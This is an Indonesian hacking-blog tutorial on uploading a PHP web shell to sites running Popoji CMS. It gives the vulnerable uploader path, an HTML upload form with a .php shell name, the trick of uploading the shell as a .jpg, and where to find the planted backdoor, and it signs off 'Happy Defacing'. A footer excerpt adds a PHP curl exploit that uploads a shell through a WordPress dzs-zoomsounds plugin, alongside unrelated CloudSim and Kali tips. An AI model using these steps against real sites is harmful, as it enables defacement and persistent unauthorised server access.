Skip to main content

Cara Upload Shell di CMS Popoji

Hello World ; Malam Fans, Please Say Hello Haters ;*
Kali ini Guee bakal Share Tutorial Cara Upload Shell di CMS Popoji , uihh :v akhirnye dah bisa upload shell wkwk <(")
ya riset upload shell ini gua dapet dari indoXploit *uihh galak inii para sesepuh, ngerisetnye ampe jozz >3<"
Sebelumnye Baca ini dulu: Deface Website berbasis CMS Popoji Lewat Register Account

okeii kita akan bahas disini, bagaimana meng-upload sebuah backdoor di POPOJI CMS

Pertama Lu harus sudah mendapatkan akses Login sebagai admin di web target !!
kalo sudah punya akun admin yang sudah terverif/aktif silahkan Lu login , sampai muncul ke page Dashbor admin


kalo dah Login, langsung buka URL bug/vuln di: 
target.c0li/po-admin/js/plugins/uploader/upload.php

Ciri2 Vuln o.O ?
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}

nb: wajib Login ke halaman dashbor dlu yee, kalo mau liat ini letak bugnyee
CSRF Code:

<form method="post" action="target.c0li/po-admin/js/plugins/uploader/upload.php" enctype="multipart/form-data">
<input type="file" name="file">
<input type="hidden" name="name" value="nama_shell_anda.php">
<input type="submit" value="exploit">
</form>

* save dgn ekstensi .html
* lalu bukak dengan browser kalean.

upload Shell lu. ingat shell kalian disini yang kalian upload harus berEkstensi .jpg (note: shellLu.jpg) , bukanlah .php, .phtml ataupun jenis bypass ekstensi yang lainnyaa.

jika berhasil . hasil output nya akan sama kyk yang pertama. tidak ada tulisan error sama sekali.

Terus cara tau Letak Shell nye Piye Om o.O ??


buka folder /po-upload/ , carane bukak url: target.c0li/po-content/po-upload/ , liat list yang kek di SS, carii shell lu, kalo dah ketemu Klik ae ..
kaloo pas folder /po-upload/ nya di buka ternyata muncul notice Forbidden wkkw, silahkan muter otak anda utk mencari backdoor lu wkwk..


akses shell: 
target/po-content/po-upload/nama_shell_anda-[angka_random]-polibrary.php


Hahaha, gak afdol yee ngeXploit tanpa tau cara bangunnye, Silahkan Baca artikel yg dulu Nue post di Blog ini: Tutorial Instalasi CMS Popoji

Sekian Artikel Cara MengUpload Backdoor pada CMS Popoji.
Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy Defacing gan ~
Sekian dan semoga bermanfaat .. terimakasih


Source and Thanks to: indoXploit


./Nuenomaru

Kami ada dan Berkarya, bukan utk disanjungi kok ^_^


Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

Comments

Post a Comment

Popular posts from this blog

How to Install CloudSim in Ubuntu (in 3 easy steps)

The contents of this DIY has been tested on Ubuntu 12.04 LTS x64 with CloudSim 3.0.3 beta and JDK8u11 x64. It should work similarly on other distros of Ubuntu and for different version of JDK as long as you use Java version 1.5 or newer. The text shown in RED in the DIY represents the values that will differ depending upon your JDK version and locations. CloudSim is a framework for modelling and simulating cloud computing infrastructure and services. In this DIY we will see how to install CloudSim in Windows easily and efficiently. A more detailed description, APIs and research papers related to CloudSim can be found here . Let us begin. Step 1: Setting up the Prerequisites 1. First of all we need to download the CloudSim and latest version of the Java Development Toolkit (JDK). CloudSim can be found here . 2. CloudSim requires a working Java installation. So, open up a terminal and run the following 1 sudo add-apt-repository ppa:webupd8team/java 2 sudo apt-get...

WordPress dzs-zoomsounds Plugins <= 2.0 - Remote File Upload Vulnerability

################################################################################################### # Exploit Title: WordPress dzs-zoomsounds Plugins Remote File Upload Vulnerability # Vendor : http: //digitalzoomstudio.net/docs/wpzoomsounds/ # Author: bl4ck-dz # Date : 28/05/2015 # Infected File: upload.php # Category: webapps # Google dork:inurl:/wp-content/plugins/dzs-zoomsounds/ # Tested on : Linux | Windows ################################################################################################### <?php $evil = "dz.phtml" ; $ch = curl_init( "http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload.php" ); curl_setopt( $ch , CURLOPT_POST, true); curl_setopt( $ch , CURLOPT_POSTFIELDS,          array ( 'file_field' => "@$evil" )); curl_setopt( $ch , CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec( $ch ); curl_close( $ch ); echo "$postResult" ; ?> Shell Access : http: //127.0.0.1/wp-content/plugins/dzs-zoo...

How To Add or Remove System Icons From The Kali Linux Desktop

When Kali Linux is started, there are always one or more system icons on the desktop. “Computer” is usually a default icon. However, some people might like to remove this icon and/or add other icons like the famous “Trash” icon. All the other tutorials will tell you to use the Linux, “gconfig-editor,” but Kali Linux does not have this system editor! I believe I am the only one who knows of a way to do this, so let me share my knowledge in this simple tutorial. Step one: Start and login to Kali Linux using your account or the “root” account. Step two: Open the main menu. Hover your mouse on “System Tools,” and click on “dconf Editor.” After a few seconds, the dconf Editor will open. Now all you have to do is browse to the correct category and set the options. Step three: When the dconf Editor window opens, click on the plus sign next to “org” (located in the left pane). Step four: Now click the plus sign next to “gnome.” Step five: Scroll down the list in the left pan...